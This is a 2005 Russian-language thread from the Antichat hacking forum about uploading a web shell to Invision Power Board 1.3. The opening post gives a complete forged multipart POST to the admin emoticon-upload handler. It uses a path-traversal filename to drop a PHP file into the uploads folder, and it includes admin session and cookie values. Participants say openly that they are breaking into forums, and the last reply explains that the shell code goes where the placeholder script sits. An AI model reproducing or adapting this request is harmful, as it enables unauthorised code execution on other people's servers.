Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Залить шелл через подделку http запросов, на примере ipb 1.3 |
15.03.2005, 02:10
|
|
Новичок
Регистрация: 02.12.2004
Сообщений: 11
Провел на форуме:
110
Репутация:
0
|
|
Залить шелл через подделку http запросов, на примере ipb 1.3
Вот Я дошёл до того момента где нужно залить шелл  прав на папке со смайлами конечно же не оказалось...
POST http://someSiteForum/admin.php?adses...1f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.php?adses...ct=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"
7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"
emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"
op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/myFile.php"
Content-Type: application/octet-stream
<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--
Всё понятно, но как указать локальный путь до файла, как он поймёт что Я именно хочу загрузить?  |
|
|
15.03.2005, 02:19
|
|
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649
Репутация:
67
|
|
А если у тебя хэш cf20fc37b4g0be45c1336f29d444e798 и id то разве нельзя потделать куки вместо http запроса? и зайти админом ? Или я что то путаю? |
|
|
|
15.03.2005, 02:34
|
|
Новичок
Регистрация: 02.12.2004
Сообщений: 11
Провел на форуме:
110
Репутация:
0
|
|
Да это само собой, Я уже в админке, но мне не форум нужен |
|
|
|
15.03.2005, 02:54
|
|
Новичок
Регистрация: 11.02.2005
Сообщений: 7
Провел на форуме:
0
Репутация:
0
|
|
да я тоже взламываю форум и хочу болше как залит шелл ???????
|
|
|
|
15.03.2005, 03:24
|
|
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649
Репутация:
67
|
|
аа.. всё торможу как всегда =) Да. Меня тоже вопрос волнует этот. Где пареметры на локальный адрес..
Последний раз редактировалось (-=util=-); 15.03.2005 в 03:29..
|
|
|
|
17.03.2005, 05:35
|
|
Новичок
Регистрация: 02.12.2004
Сообщений: 11
Провел на форуме:
110
Репутация:
0
|
|
Algol, пожалуйста, обрати внимание! =\
|
|
|
|
17.03.2005, 05:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Последний раз редактировалось White Jordan; 17.03.2005 в 05:45..
|
|
|
|
17.03.2005, 08:43
|
|
Новичок
Регистрация: 02.12.2004
Сообщений: 11
Провел на форуме:
110
Репутация:
0
|
|
Ну он же эту статью писал (про ipb1.3) он должен знать...
|
|
|
|
17.03.2005, 13:40
|
|
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649
Репутация:
67
|
|
ну что никто неотвечает? Вообще последнее время что то нету активного народа не форуме....
|
|
|
|
17.03.2005, 13:50
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
Сообщение от SURRENDER
Всё понятно, но как указать локальный путь до файла, как он поймёт что Я именно хочу загрузить? Какой еще файл?? Вся отсылаемая на сервер информация УЖЕ содержится в HTTP-пакете.
А вот это
PHP код:
<% echo("Hello from injected PHP script") %>
и есть сам скрипт, который ты заливаешь. Вместо приведенного, тебе естественно, нужно вставить текст шелла.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
